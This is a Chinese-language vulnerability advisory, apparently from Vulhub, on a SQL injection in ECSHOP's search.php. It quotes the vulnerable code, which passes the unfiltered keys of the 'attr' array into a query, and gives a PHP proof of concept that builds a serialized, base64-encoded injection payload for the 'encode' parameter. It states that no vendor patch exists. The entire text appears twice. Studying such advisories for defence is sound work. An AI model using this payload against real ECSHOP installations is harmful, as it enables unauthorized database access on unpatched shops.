VULHUB ™

文件 search.php $string = base64_decode(trim($_GET['encode'])); //37行 $_REQUEST = array_merge($_REQUEST, addslashes_deep($string)); //69行 可以看出addslashes_deep 只能参数值进行过滤。 //297行 if (!empty($_REQUEST['attr'])) { $sql = "SELECT goods_id, COUNT(*) AS num FROM " . $ecs->table("goods_attr") . " WHERE 0 "; foreach ($_REQUEST['attr'] AS $key => $val) { if (is_not_null($val)) { $attr_num++; $sql .= " OR (1 "; if (is_array($val)) { $sql .= " AND attr_id = '$key'"; $key是$_REQUEST['attr'] 的键值，就是这里没有过滤，直接进入SQL查询，造成SQL注入漏洞 可自行构造encode 的值进行注入。 <?php $list=array("1' or 1=1) and 1=2 GROUP BY goods_id HAVING num = '1' /*"=>"yy"); $string = array("attr"=>$list); $string = str_replace('+', '%2b', base64_encode(serialize($string))); die($string); ?> ECSHOP All Version 厂商补丁 ECSHOP ---------- 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.ecshop.com

文件 search.php $string = base64_decode(trim($_GET['encode'])); //37行 $_REQUEST = array_merge($_REQUEST, addslashes_deep($string)); //69行 可以看出addslashes_deep 只能参数值进行过滤。 //297行 if (!empty($_REQUEST['attr'])) { $sql = "SELECT goods_id, COUNT(*) AS num FROM " . $ecs->table("goods_attr") . " WHERE 0 "; foreach ($_REQUEST['attr'] AS $key => $val) { if (is_not_null($val)) { $attr_num++; $sql .= " OR (1 "; if (is_array($val)) { $sql .= " AND attr_id = '$key'"; $key是$_REQUEST['attr'] 的键值，就是这里没有过滤，直接进入SQL查询，造成SQL注入漏洞 可自行构造encode 的值进行注入。 <?php $list=array("1' or 1=1) and 1=2 GROUP BY goods_id HAVING num = '1' /*"=>"yy"); $string = array("attr"=>$list); $string = str_replace('+', '%2b', base64_encode(serialize($string))); die($string); ?> ECSHOP All Version 厂商补丁 ECSHOP ---------- 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.ecshop.com